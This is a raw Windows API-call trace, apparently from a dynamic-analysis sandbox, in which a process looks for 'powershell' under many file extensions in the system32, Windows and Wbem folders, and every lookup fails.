	[0338.140] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.141] SetErrorMode (uMode=0x1) returned 0x1
	[0338.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.141] SetErrorMode (uMode=0x1) returned 0x1
	[0338.141] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.141] SetErrorMode (uMode=0x1) returned 0x1
	[0338.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.141] SetErrorMode (uMode=0x1) returned 0x1
	[0338.142] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.142] SetErrorMode (uMode=0x1) returned 0x1
	[0338.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.142] SetErrorMode (uMode=0x1) returned 0x1
	[0338.142] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.142] SetErrorMode (uMode=0x1) returned 0x1
	[0338.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.143] SetErrorMode (uMode=0x1) returned 0x1
	[0338.143] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.143] SetErrorMode (uMode=0x1) returned 0x1
	[0338.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.143] SetErrorMode (uMode=0x1) returned 0x1
	[0338.143] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.144] SetErrorMode (uMode=0x1) returned 0x1
	[0338.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.144] SetErrorMode (uMode=0x1) returned 0x1
	[0338.144] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.144] SetErrorMode (uMode=0x1) returned 0x1
	[0338.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.144] SetErrorMode (uMode=0x1) returned 0x1
	[0338.145] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.145] SetErrorMode (uMode=0x1) returned 0x1
	[0338.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0338.145] SetErrorMode (uMode=0x1) returned 0x1
	[0338.145] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.145] SetErrorMode (uMode=0x1) returned 0x1
	[0338.146] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.146] SetErrorMode (uMode=0x1) returned 0x1
	[0338.146] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.146] SetErrorMode (uMode=0x1) returned 0x1
	[0338.146] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.146] SetErrorMode (uMode=0x1) returned 0x1
	[0338.146] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.147] SetErrorMode (uMode=0x1) returned 0x1
	[0338.147] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.147] SetErrorMode (uMode=0x1) returned 0x1
	[0338.147] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.147] SetErrorMode (uMode=0x1) returned 0x1
	[0338.147] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.147] SetErrorMode (uMode=0x1) returned 0x1
	[0338.148] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.148] SetErrorMode (uMode=0x1) returned 0x1
	[0338.148] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.148] SetErrorMode (uMode=0x1) returned 0x1
	[0338.148] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.148] SetErrorMode (uMode=0x1) returned 0x1
	[0338.148] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.149] SetErrorMode (uMode=0x1) returned 0x1
	[0338.149] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.149] SetErrorMode (uMode=0x1) returned 0x1
	[0338.149] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.149] SetErrorMode (uMode=0x1) returned 0x1
	[0338.149] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.150] SetErrorMode (uMode=0x1) returned 0x1
	[0338.150] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.150] SetErrorMode (uMode=0x1) returned 0x1
	[0338.150] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.150] SetErrorMode (uMode=0x1) returned 0x1
	[0338.150] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.150] SetErrorMode (uMode=0x1) returned 0x1
	[0338.151] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.151] SetErrorMode (uMode=0x1) returned 0x1
	[0338.151] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.151] SetErrorMode (uMode=0x1) returned 0x1
	[0338.151] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.152] SetErrorMode (uMode=0x1) returned 0x1
	[0338.152] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.152] SetErrorMode (uMode=0x1) returned 0x1
	[0338.152] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.152] SetErrorMode (uMode=0x1) returned 0x1
	[0338.152] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.152] SetErrorMode (uMode=0x1) returned 0x1
	[0338.153] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.153] SetErrorMode (uMode=0x1) returned 0x1
	[0338.153] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.153] SetErrorMode (uMode=0x1) returned 0x1
	[0338.153] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.153] SetErrorMode (uMode=0x1) returned 0x1
	[0338.154] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.154] SetErrorMode (uMode=0x1) returned 0x1
	[0338.154] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.154] SetErrorMode (uMode=0x1) returned 0x1
	[0338.154] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0338.154] SetErrorMode (uMode=0x1) returned 0x1
	[0338.154] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.155] SetErrorMode (uMode=0x1) returned 0x1
	[0338.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.155] SetErrorMode (uMode=0x1) returned 0x1
	[0338.155] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.155] SetErrorMode (uMode=0x1) returned 0x1
	[0338.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.156] SetErrorMode (uMode=0x1) returned 0x1
	[0338.156] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.156] SetErrorMode (uMode=0x1) returned 0x1
	[0338.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.156] SetErrorMode (uMode=0x1) returned 0x1
	[0338.156] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.156] SetErrorMode (uMode=0x1) returned 0x1
	[0338.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.157] SetErrorMode (uMode=0x1) returned 0x1
	[0338.157] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.157] SetErrorMode (uMode=0x1) returned 0x1
	[0338.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.157] SetErrorMode (uMode=0x1) returned 0x1
	[0338.157] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.158] SetErrorMode (uMode=0x1) returned 0x1
	[0338.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.158] SetErrorMode (uMode=0x1) returned 0x1
	[0338.158] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.158] SetErrorMode (uMode=0x1) returned 0x1
	[0338.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.159] SetErrorMode (uMode=0x1) returned 0x1
	[0338.159] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7ae020 | out: lpFindFileData=0x1c7ae020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0338.159] SetErrorMode (uMode=0x1) returned 0x1
	[0338.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7ade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0338.159] SetErrorMode (uMode=0x1) returned 0x1
